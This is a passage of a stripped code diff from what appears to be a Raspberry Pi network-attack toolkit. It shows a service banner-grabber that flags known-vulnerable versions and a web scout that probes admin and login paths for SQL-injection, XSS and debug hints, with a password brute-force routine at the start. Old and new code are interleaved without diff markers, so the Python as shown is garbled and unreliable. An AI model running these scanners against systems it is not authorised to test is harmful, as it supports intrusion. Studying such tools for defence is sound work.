f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
@@ -270,3 +285,4 @@ if __name__ == "__main__":
except Exception as e:
logger.error(f"Error: {e}")
exit(1)


@@ -1,214 +1,191 @@
# Service fingerprinting and version detection tool for vulnerability identification.
# Saves settings in `/home/bjorn/.settings_bjorn/thor_hammer_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -t, --target Target IP or hostname to scan (overrides saved value).
# -p, --ports Ports to scan (default: common ports, comma-separated).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/services).
# -d, --delay Delay between probes in seconds (default: 1).
# -v, --verbose Enable verbose output for detailed service information.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
thor_hammer.py — Service fingerprinting (Pi Zero friendly, orchestrator compatible).
What it does:
- For a given target (ip, port), tries a fast TCP connect + banner grab.
- Optionally stores a service fingerprint into DB.port_services via db.upsert_port_service.
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
Notes:
- Avoids spawning nmap per-port (too heavy). If you want nmap, add a dedicated action.
"""
import os
import json
import socket
import argparse
import threading
from datetime import datetime
import logging
from concurrent.futures import ThreadPoolExecutor
import subprocess
import socket
import time
from typing import Dict, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="thor_hammer.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "ThorHammer"
b_module = "thor_hammer"
b_status = "ThorHammer"
b_port = None
b_parent = None
b_service = '["ssh","ftp","telnet","http","https","smb","mysql","postgres","mssql","rdp","vnc"]'
b_trigger = "on_port_change"
b_priority = 35
b_action = "normal"
b_cooldown = 1200
b_rate_limit = "24/86400"
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
def _guess_service_from_port(port: int) -> str:
mapping = {
21: "ftp",
22: "ssh",
23: "telnet",
25: "smtp",
53: "dns",
80: "http",
110: "pop3",
139: "netbios-ssn",
143: "imap",
443: "https",
445: "smb",
1433: "mssql",
3306: "mysql",
3389: "rdp",
5432: "postgres",
5900: "vnc",
8080: "http",
}
return mapping.get(int(port), "")
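The port-to-service lookup above can be exercised in isolation. A minimal sketch, with the mapping reproduced inline so the snippet is self-contained (the real module keeps it in `_guess_service_from_port`):

```python
# Subset of the well-known-port table used by _guess_service_from_port.
WELL_KNOWN_PORTS = {
    21: "ftp", 22: "ssh", 23: "telnet", 80: "http",
    443: "https", 445: "smb", 3306: "mysql", 8080: "http",
}

def guess_service(port) -> str:
    # int() coercion mirrors the module: string ports like "443" work too.
    # Unknown ports fall back to an empty string.
    return WELL_KNOWN_PORTS.get(int(port), "")

print(guess_service(22))     # ssh
print(guess_service("443"))  # https
```

The empty-string fallback keeps callers simple: they can test `if service:` without catching exceptions for unmapped ports.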
b_class = "ThorHammer"
b_module = "thor_hammer"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/services"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "thor_hammer_settings.json")
DEFAULT_PORTS = [21, 22, 23, 25, 53, 80, 110, 115, 139, 143, 194, 443, 445, 1433, 3306, 3389, 5432, 5900, 8080]
# Service signature database
SERVICE_SIGNATURES = {
21: {
'name': 'FTP',
'vulnerabilities': {
'vsftpd 2.3.4': 'Backdoor command execution',
'ProFTPD 1.3.3c': 'Remote code execution'
}
},
22: {
'name': 'SSH',
'vulnerabilities': {
'OpenSSH 5.3': 'Username enumeration',
'OpenSSH 7.2p1': 'User enumeration timing attack'
}
},
# Add more signatures as needed
}
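The signature table pairs a service name with version substrings known to be vulnerable. A standalone sketch of the case-insensitive matching the scanner performs against a grabbed banner (table trimmed to two entries here for brevity):

```python
# Trimmed copy of the SERVICE_SIGNATURES structure, for a runnable example.
SERVICE_SIGNATURES = {
    21: {"name": "FTP",
         "vulnerabilities": {"vsftpd 2.3.4": "Backdoor command execution"}},
    22: {"name": "SSH",
         "vulnerabilities": {"OpenSSH 5.3": "Username enumeration"}},
}

def match_vulns(port: int, version: str):
    sig = SERVICE_SIGNATURES.get(port)
    if not sig or not version:
        return []
    # Case-insensitive substring match, as in the module's version check.
    return [
        {"version": v, "description": d}
        for v, d in sig["vulnerabilities"].items()
        if v.lower() in version.lower()
    ]

print(match_vulns(21, "220 (vsFTPd 2.3.4)"))
```

Substring matching is deliberately loose: a banner like `220 (vsFTPd 2.3.4)` still hits the `vsftpd 2.3.4` signature despite the different casing and surrounding text.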
class ThorHammer:
def __init__(self, target, ports=None, output_dir=DEFAULT_OUTPUT_DIR, delay=1, verbose=False):
self.target = target
self.ports = ports or DEFAULT_PORTS
self.output_dir = output_dir
self.delay = delay
self.verbose = verbose
self.results = {
'target': target,
'timestamp': datetime.now().isoformat(),
'services': {}
}
self.lock = threading.Lock()
def __init__(self, shared_data):
self.shared_data = shared_data
def probe_service(self, port):
"""Probe a specific port for service information."""
def _connect_and_banner(self, ip: str, port: int, timeout_s: float, max_bytes: int) -> Tuple[bool, str]:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout_s)
try:
# Initial connection test
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self.delay)
result = sock.connect_ex((self.target, port))
if result == 0:
service_info = {
'port': port,
'state': 'open',
'service': None,
'version': None,
'vulnerabilities': []
if s.connect_ex((ip, int(port))) != 0:
return False, ""
try:
data = s.recv(max_bytes)
banner = (data or b"").decode("utf-8", errors="ignore").strip()
except Exception:
banner = ""
return True, banner
finally:
try:
s.close()
except Exception:
pass
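The connect-and-banner step above can be demonstrated end to end against a throwaway local server. This is a sketch mirroring the shape of `_connect_and_banner` (not the module's exact code); the fake SSH banner is an assumption for the demo:

```python
import socket
import threading

def grab_banner(ip: str, port: int, timeout_s: float = 1.5, max_bytes: int = 1024):
    # Fast TCP connect; connect_ex returns 0 on success instead of raising.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout_s)
    try:
        if s.connect_ex((ip, int(port))) != 0:
            return False, ""
        try:
            data = s.recv(max_bytes)
            banner = (data or b"").decode("utf-8", errors="ignore").strip()
        except OSError:
            banner = ""  # open port, but nothing volunteered before timeout
        return True, banner
    finally:
        s.close()

# Throwaway local server that sends one fake banner and hangs up.
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind(("127.0.0.1", 0))
srv.listen(1)
port = srv.getsockname()[1]

def serve_once():
    conn, _ = srv.accept()
    conn.sendall(b"SSH-2.0-OpenSSH_9.6\r\n")
    conn.close()

threading.Thread(target=serve_once, daemon=True).start()
ok, banner = grab_banner("127.0.0.1", port)
srv.close()
print(ok, banner)  # True SSH-2.0-OpenSSH_9.6
```

Note the distinction the tuple return preserves: `(True, "")` means the port is open but silent (common for HTTP, which speaks only when spoken to), while `(False, "")` means the connection itself failed.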
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else None
except Exception:
port_i = None
# If port is missing, try to infer from row 'Ports' and fingerprint a few.
ports_to_check = []
if port_i:
ports_to_check = [port_i]
else:
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for p in ports_txt.split(";"):
p = p.strip()
if p.isdigit():
ports_to_check.append(int(p))
ports_to_check = ports_to_check[:12] # Pi Zero guard
if not ports_to_check:
return "failed"
timeout_s = float(getattr(self.shared_data, "thor_connect_timeout_s", 1.5))
max_bytes = int(getattr(self.shared_data, "thor_banner_max_bytes", 1024))
source = str(getattr(self.shared_data, "thor_source", "thor_hammer"))
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
self.shared_data.bjorn_orch_status = "ThorHammer"
self.shared_data.bjorn_status_text2 = ip
self.shared_data.comment_params = {"ip": ip, "port": str(ports_to_check[0])}
progress = ProgressTracker(self.shared_data, len(ports_to_check))
try:
any_open = False
for p in ports_to_check:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
ok, banner = self._connect_and_banner(ip, p, timeout_s=timeout_s, max_bytes=max_bytes)
any_open = any_open or ok
service = _guess_service_from_port(p)
product = ""
version = ""
fingerprint = banner[:200] if banner else ""
confidence = 0.4 if ok else 0.1
state = "open" if ok else "closed"
self.shared_data.comment_params = {
"ip": ip,
"port": str(p),
"open": str(int(ok)),
"svc": service or "?",
}
# Get service banner
# Persist to DB if method exists.
try:
banner = sock.recv(1024).decode('utf-8', errors='ignore').strip()
service_info['banner'] = banner
except Exception:
service_info['banner'] = None
if hasattr(self.shared_data, "db") and hasattr(self.shared_data.db, "upsert_port_service"):
self.shared_data.db.upsert_port_service(
mac_address=mac or "",
ip=ip,
port=int(p),
protocol="tcp",
state=state,
service=service or None,
product=product or None,
version=version or None,
banner=banner or None,
fingerprint=fingerprint or None,
confidence=float(confidence),
source=source,
)
except Exception as e:
logger.error(f"DB upsert_port_service failed for {ip}:{p}: {e}")
# Advanced service detection using nmap if available
try:
nmap_output = subprocess.check_output(
['nmap', '-sV', '-p', str(port), '-T4', self.target],
stderr=subprocess.DEVNULL
).decode()
# Parse nmap output
for line in nmap_output.split('\n'):
if str(port) in line and 'open' in line:
service_info['service'] = line.split()[2]
if len(line.split()) > 3:
service_info['version'] = ' '.join(line.split()[3:])
except Exception:
pass
progress.advance(1)
# Check for known vulnerabilities
if port in SERVICE_SIGNATURES:
sig = SERVICE_SIGNATURES[port]
service_info['service'] = service_info['service'] or sig['name']
if service_info['version']:
for vuln_version, vuln_desc in sig['vulnerabilities'].items():
if vuln_version.lower() in service_info['version'].lower():
service_info['vulnerabilities'].append({
'version': vuln_version,
'description': vuln_desc
})
progress.set_complete()
return "success" if any_open else "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
with self.lock:
self.results['services'][port] = service_info
if self.verbose:
logging.info(f"Service detected on port {port}: {service_info['service']}")
sock.close()
# -------------------- Optional CLI (debug/manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
except Exception as e:
logging.error(f"Error probing port {port}: {e}")
def save_results(self):
"""Save scan results to a JSON file."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
filename = os.path.join(self.output_dir, f"service_scan_{timestamp}.json")
with open(filename, 'w') as f:
json.dump(self.results, f, indent=4)
logging.info(f"Results saved to {filename}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
"""Execute the service scanning and fingerprinting process."""
logging.info(f"Starting service scan on {self.target}")
with ThreadPoolExecutor(max_workers=10) as executor:
executor.map(self.probe_service, self.ports)
self.save_results()
return self.results
def save_settings(target, ports, output_dir, delay, verbose):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"target": target,
"ports": ports,
"output_dir": output_dir,
"delay": delay,
"verbose": verbose
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Service fingerprinting and vulnerability detection tool")
parser.add_argument("-t", "--target", help="Target IP or hostname")
parser.add_argument("-p", "--ports", help="Ports to scan (comma-separated)")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
parser.add_argument("-d", "--delay", type=float, default=1, help="Delay between probes")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
parser = argparse.ArgumentParser(description="ThorHammer (service fingerprint)")
parser.add_argument("--ip", required=True)
parser.add_argument("--port", default="22")
args = parser.parse_args()
settings = load_settings()
target = args.target or settings.get("target")
ports = [int(p) for p in args.ports.split(',')] if args.ports else settings.get("ports", DEFAULT_PORTS)
output_dir = args.output or settings.get("output_dir")
delay = args.delay or settings.get("delay")
verbose = args.verbose or settings.get("verbose")
sd = SharedData()
act = ThorHammer(sd)
row = {"MAC Address": sd.get_raspberry_mac() or "__GLOBAL__", "Hostname": "", "Ports": args.port}
print(act.execute(args.ip, args.port, row, "ThorHammer"))
if not target:
logging.error("Target is required. Use -t or save it in settings")
return
save_settings(target, ports, output_dir, delay, verbose)
scanner = ThorHammer(
target=target,
ports=ports,
output_dir=output_dir,
delay=delay,
verbose=verbose
)
scanner.execute()
if __name__ == "__main__":
main()


@@ -1,313 +1,396 @@
# Web application scanner for discovering hidden paths and vulnerabilities.
# Saves settings in `/home/bjorn/.settings_bjorn/valkyrie_scout_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -u, --url Target URL to scan (overrides saved value).
# -w, --wordlist Path to directory wordlist (default: built-in list).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/webscan).
# -t, --threads Number of concurrent threads (default: 10).
# -d, --delay Delay between requests in seconds (default: 0.1).
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
valkyrie_scout.py — Web surface scout (Pi Zero friendly, orchestrator compatible).
What it does:
- Probes a small set of common web paths on a target (ip, port).
- Extracts high-signal indicators from responses (auth type, login form hints, missing security headers,
error/debug strings). No exploitation, no bruteforce.
- Writes results into DB table `webenum` (tool='valkyrie_scout') so the UI can browse findings.
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import os
import json
import requests
import argparse
from datetime import datetime
import logging
import threading
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urljoin
import re
from bs4 import BeautifulSoup
import ssl
import time
from http.client import HTTPConnection, HTTPSConnection, RemoteDisconnected
from typing import Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="valkyrie_scout.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "ValkyrieScout"
b_module = "valkyrie_scout"
b_status = "ValkyrieScout"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_web_service"
b_priority = 50
b_action = "normal"
b_cooldown = 1800
b_rate_limit = "8/86400"
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
# Small default list to keep the action cheap on Pi Zero.
DEFAULT_PATHS = [
"/",
"/robots.txt",
"/login",
"/signin",
"/auth",
"/admin",
"/administrator",
"/wp-login.php",
"/user/login",
]
# Keep patterns minimal and high-signal.
SQLI_ERRORS = [
"error in your sql syntax",
"mysql_fetch",
"unclosed quotation mark",
"ora-",
"postgresql",
"sqlite error",
]
LFI_HINTS = [
"include(",
"require(",
"include_once(",
"require_once(",
]
DEBUG_HINTS = [
"stack trace",
"traceback",
"exception",
"fatal error",
"notice:",
"warning:",
"debug",
]
b_class = "ValkyrieScout"
b_module = "valkyrie_scout"
b_enabled = 0
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
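The scheme heuristic is a pure set lookup, shown here standalone (the HTTPS port set is copied from `_scheme_for_port`; anything not listed is assumed to be plain HTTP):

```python
# Ports that are probed over TLS; everything else defaults to plain HTTP.
HTTPS_PORTS = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}

def scheme_for_port(port) -> str:
    return "https" if int(port) in HTTPS_PORTS else "http"

print(scheme_for_port(80))    # http
print(scheme_for_port(8443))  # https
```

Defaulting unknown ports to HTTP is the cheap choice for a first probe; a wrong guess simply yields a failed fetch rather than an error.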
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/webscan"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "valkyrie_scout_settings.json")
# Common web vulnerabilities to check
VULNERABILITY_PATTERNS = {
'sql_injection': [
"error in your SQL syntax",
"mysql_fetch_array",
"ORA-",
"PostgreSQL",
],
'xss': [
"<script>alert(1)</script>",
"javascript:alert(1)",
],
'lfi': [
"include(",
"require(",
"include_once(",
"require_once(",
]
}
class ValkyieScout:
def __init__(self, url, wordlist=None, output_dir=DEFAULT_OUTPUT_DIR, threads=10, delay=0.1):
self.base_url = url.rstrip('/')
self.wordlist = wordlist
self.output_dir = output_dir
self.threads = threads
self.delay = delay
self.discovered_paths = set()
self.vulnerabilities = []
self.forms = []
self.session = requests.Session()
self.session.headers = {
'User-Agent': 'Valkyrie Scout Web Scanner',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
}
self.lock = threading.Lock()
def load_wordlist(self):
"""Load directory wordlist."""
if self.wordlist and os.path.exists(self.wordlist):
with open(self.wordlist, 'r') as f:
return [line.strip() for line in f if line.strip()]
return [
'admin', 'wp-admin', 'administrator', 'login', 'wp-login.php',
'upload', 'uploads', 'backup', 'backups', 'config', 'configuration',
'dev', 'development', 'test', 'testing', 'staging', 'prod',
'api', 'v1', 'v2', 'beta', 'debug', 'console', 'phpmyadmin',
'mysql', 'database', 'db', 'wp-content', 'includes', 'tmp', 'temp'
]
def scan_path(self, path):
"""Scan a single path for existence and vulnerabilities."""
url = urljoin(self.base_url, path)
try:
response = self.session.get(url, allow_redirects=False)
if response.status_code in [200, 301, 302, 403]:
with self.lock:
# a set cannot hold dicts (unhashable); store a hashable tuple instead
self.discovered_paths.add((
path,
url,
response.status_code,
len(response.content),
datetime.now().isoformat(),
))
# Scan for vulnerabilities
self.check_vulnerabilities(url, response)
# Extract and analyze forms
self.analyze_forms(url, response)
except Exception as e:
logging.error(f"Error scanning {url}: {e}")
def check_vulnerabilities(self, url, response):
"""Check for common vulnerabilities in the response."""
try:
content = response.text.lower()
for vuln_type, patterns in VULNERABILITY_PATTERNS.items():
for pattern in patterns:
if pattern.lower() in content:
with self.lock:
self.vulnerabilities.append({
'type': vuln_type,
'url': url,
'pattern': pattern,
'timestamp': datetime.now().isoformat()
})
# Additional checks
self.check_security_headers(url, response)
self.check_information_disclosure(url, response)
except Exception as e:
logging.error(f"Error checking vulnerabilities for {url}: {e}")
def analyze_forms(self, url, response):
"""Analyze HTML forms for potential vulnerabilities."""
try:
soup = BeautifulSoup(response.text, 'html.parser')
forms = soup.find_all('form')
for form in forms:
form_data = {
'url': url,
'method': form.get('method', 'get').lower(),
'action': urljoin(url, form.get('action', '')),
'inputs': [],
'timestamp': datetime.now().isoformat()
}
# Analyze form inputs
for input_field in form.find_all(['input', 'textarea']):
input_data = {
'type': input_field.get('type', 'text'),
'name': input_field.get('name', ''),
'id': input_field.get('id', ''),
'required': input_field.get('required') is not None
}
form_data['inputs'].append(input_data)
with self.lock:
self.forms.append(form_data)
except Exception as e:
logging.error(f"Error analyzing forms in {url}: {e}")
def check_security_headers(self, url, response):
"""Check for missing or misconfigured security headers."""
security_headers = {
'X-Frame-Options': 'Missing X-Frame-Options header',
'X-XSS-Protection': 'Missing X-XSS-Protection header',
'X-Content-Type-Options': 'Missing X-Content-Type-Options header',
'Strict-Transport-Security': 'Missing HSTS header',
'Content-Security-Policy': 'Missing Content-Security-Policy'
}
for header, message in security_headers.items():
if header not in response.headers:
with self.lock:
self.vulnerabilities.append({
'type': 'missing_security_header',
'url': url,
'detail': message,
'timestamp': datetime.now().isoformat()
})
def check_information_disclosure(self, url, response):
"""Check for information disclosure in response."""
patterns = {
'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
'internal_ip': r'\b(?:10(?:\.\d{1,3}){3}|172\.(?:1[6-9]|2[0-9]|3[01])(?:\.\d{1,3}){2}|192\.168(?:\.\d{1,3}){2})\b',
'debug_info': r'(?:stack trace|debug|error|exception)',
'version_info': r'(?:version|powered by|built with)'
}
content = response.text.lower()
for info_type, pattern in patterns.items():
matches = re.findall(pattern, content, re.IGNORECASE)
if matches:
with self.lock:
self.vulnerabilities.append({
'type': 'information_disclosure',
'url': url,
'info_type': info_type,
'findings': matches,
'timestamp': datetime.now().isoformat()
})
def save_results(self):
"""Save scan results to JSON files."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
# Save discovered paths
if self.discovered_paths:
paths_file = os.path.join(self.output_dir, f"paths_{timestamp}.json")
with open(paths_file, 'w') as f:
json.dump(list(self.discovered_paths), f, indent=4)
# Save vulnerabilities
if self.vulnerabilities:
vulns_file = os.path.join(self.output_dir, f"vulnerabilities_{timestamp}.json")
with open(vulns_file, 'w') as f:
json.dump(self.vulnerabilities, f, indent=4)
# Save form analysis
if self.forms:
forms_file = os.path.join(self.output_dir, f"forms_{timestamp}.json")
with open(forms_file, 'w') as f:
json.dump(self.forms, f, indent=4)
logging.info(f"Results saved to {self.output_dir}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
"""Execute the web application scan."""
try:
logging.info(f"Starting web scan on {self.base_url}")
paths = self.load_wordlist()
with ThreadPoolExecutor(max_workers=self.threads) as executor:
executor.map(self.scan_path, paths)
self.save_results()
except Exception as e:
logging.error(f"Scan error: {e}")
finally:
self.session.close()
def save_settings(url, wordlist, output_dir, threads, delay):
"""Save settings to JSON file."""
def _first_hostname_from_row(row: Dict) -> str:
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"url": url,
"wordlist": wordlist,
"output_dir": output_dir,
"threads": threads,
"delay": delay
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
hn = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hn:
hn = hn.split(";", 1)[0].strip()
return hn
except Exception:
return ""
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
def _lower_headers(headers: Dict[str, str]) -> Dict[str, str]:
out = {}
for k, v in (headers or {}).items():
if not k:
continue
out[str(k).lower()] = str(v)
return out
def _detect_signals(status: int, headers: Dict[str, str], body_snippet: str) -> Dict[str, object]:
h = _lower_headers(headers)
www = h.get("www-authenticate", "")
set_cookie = h.get("set-cookie", "")
auth_type = None
if status == 401 and "basic" in www.lower():
auth_type = "basic"
elif status == 401 and "digest" in www.lower():
auth_type = "digest"
snippet = (body_snippet or "").lower()
has_form = "<form" in snippet
has_password = "type=\"password\"" in snippet or "type='password'" in snippet
looks_like_login = bool(has_form and has_password) or any(x in snippet for x in ["login", "sign in", "connexion"])
csrf_markers = [
"csrfmiddlewaretoken",
"authenticity_token",
"csrf_token",
"name=\"_token\"",
"name='_token'",
]
has_csrf = any(m in snippet for m in csrf_markers)
missing_headers = []
for header in [
"x-frame-options",
"x-content-type-options",
"content-security-policy",
"referrer-policy",
]:
if header not in h:
missing_headers.append(header)
# HSTS is only relevant on HTTPS.
if "strict-transport-security" not in h:
missing_headers.append("strict-transport-security")
rate_limited_hint = (status == 429) or ("retry-after" in h) or ("x-ratelimit-remaining" in h)
# Very cheap "issue hints"
issues = []
for s in SQLI_ERRORS:
if s in snippet:
issues.append("sqli_error_hint")
break
for s in LFI_HINTS:
if s in snippet:
issues.append("lfi_hint")
break
for s in DEBUG_HINTS:
if s in snippet:
issues.append("debug_hint")
break
cookie_names = []
if set_cookie:
for part in set_cookie.split(","):
name = part.split(";", 1)[0].split("=", 1)[0].strip()
if name and name not in cookie_names:
cookie_names.append(name)
return {
"auth_type": auth_type,
"looks_like_login": bool(looks_like_login),
"has_csrf": bool(has_csrf),
"missing_security_headers": missing_headers[:12],
"rate_limited_hint": bool(rate_limited_hint),
"issues": issues[:8],
"cookie_names": cookie_names[:12],
"server": h.get("server", ""),
"x_powered_by": h.get("x-powered-by", ""),
}
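The header checks above boil down to lower-casing the response header names once and probing a fixed checklist. A standalone sketch of just the missing-security-headers part of `_detect_signals`:

```python
# Checklist probed by _detect_signals (HSTS is checked unconditionally here,
# as in the module, even though it only matters on HTTPS responses).
REQUIRED = [
    "x-frame-options",
    "x-content-type-options",
    "content-security-policy",
    "referrer-policy",
    "strict-transport-security",
]

def missing_security_headers(headers):
    # Header names are case-insensitive per RFC 9110; normalize once.
    h = {str(k).lower(): v for k, v in (headers or {}).items()}
    return [name for name in REQUIRED if name not in h]

resp_headers = {
    "Content-Type": "text/html",
    "X-Frame-Options": "DENY",
    "Server": "nginx",
}
print(missing_security_headers(resp_headers))
```

Because the checklist is iterated in order, the output list is stable, which keeps the stored `missing_security_headers` field diff-friendly across repeated scans of the same host.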
class ValkyrieScout:
def __init__(self, shared_data):
self.shared_data = shared_data
self._ssl_ctx = ssl._create_unverified_context()
def _fetch(
self,
*,
ip: str,
port: int,
scheme: str,
path: str,
timeout_s: float,
user_agent: str,
max_bytes: int,
) -> Tuple[int, Dict[str, str], str, int, int]:
started = time.time()
headers_out: Dict[str, str] = {}
status = 0
size = 0
body_snip = ""
conn = None
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
if scheme == "https":
conn = HTTPSConnection(ip, port=port, timeout=timeout_s, context=self._ssl_ctx)
else:
conn = HTTPConnection(ip, port=port, timeout=timeout_s)
def main():
parser = argparse.ArgumentParser(description="Web application vulnerability scanner")
parser.add_argument("-u", "--url", help="Target URL to scan")
parser.add_argument("-w", "--wordlist", help="Path to directory wordlist")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads")
parser.add_argument("-d", "--delay", type=float, default=0.1, help="Delay between requests")
conn.request("GET", path, headers={"User-Agent": user_agent, "Accept": "*/*"})
resp = conn.getresponse()
status = int(resp.status or 0)
for k, v in resp.getheaders():
if k and v:
headers_out[str(k)] = str(v)
chunk = resp.read(max_bytes)
size = len(chunk or b"")
try:
body_snip = (chunk or b"").decode("utf-8", errors="ignore")
except Exception:
body_snip = ""
except (ConnectionError, TimeoutError, RemoteDisconnected):
status = 0
except Exception:
status = 0
finally:
try:
if conn:
conn.close()
except Exception:
pass
elapsed_ms = int((time.time() - started) * 1000)
return status, headers_out, body_snip, size, elapsed_ms
def _db_upsert(
self,
*,
mac: str,
ip: str,
hostname: str,
port: int,
path: str,
status: int,
size: int,
response_ms: int,
content_type: str,
payload: dict,
user_agent: str,
):
try:
headers_json = json.dumps(payload, ensure_ascii=True)
except Exception:
headers_json = ""
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'valkyrie_scout', 'GET', ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
user_agent = COALESCE(excluded.user_agent, webenum.user_agent),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
path or "/",
int(status),
int(size or 0),
int(response_ms or 0),
content_type or "",
user_agent or "",
headers_json,
),
)
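The `INSERT ... ON CONFLICT ... DO UPDATE` pattern used by `_db_upsert` can be demonstrated against an in-memory SQLite table with the same conflict key, `(mac_address, ip, port, directory)`. The schema here is simplified for the sketch:

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("""
    CREATE TABLE webenum (
        mac_address TEXT, ip TEXT, port INTEGER, directory TEXT,
        status INTEGER,
        UNIQUE (mac_address, ip, port, directory)
    )
""")

def upsert(mac, ip, port, path, status):
    # Re-scanning the same path updates the row in place instead of
    # raising a uniqueness error or duplicating the finding.
    con.execute("""
        INSERT INTO webenum (mac_address, ip, port, directory, status)
        VALUES (?, ?, ?, ?, ?)
        ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
            status = excluded.status
    """, (mac, ip, port, path, status))

upsert("aa:bb", "10.0.0.5", 80, "/admin", 301)
upsert("aa:bb", "10.0.0.5", 80, "/admin", 200)  # same key: row updated
rows = con.execute("SELECT COUNT(*), MAX(status) FROM webenum").fetchone()
print(rows)  # (1, 200)
```

The `excluded.` pseudo-table refers to the row that would have been inserted; this syntax requires SQLite 3.24+, which ships with all currently supported Python versions.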
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else int(getattr(self, "port", 80) or 80)
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
hostname = _first_hostname_from_row(row)
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
timeout_s = float(getattr(self.shared_data, "web_probe_timeout_s", 4.0))
user_agent = str(getattr(self.shared_data, "web_probe_user_agent", "BjornWebScout/1.0"))
max_bytes = int(getattr(self.shared_data, "web_probe_max_bytes", 65536))
delay_s = float(getattr(self.shared_data, "valkyrie_delay_s", 0.05))
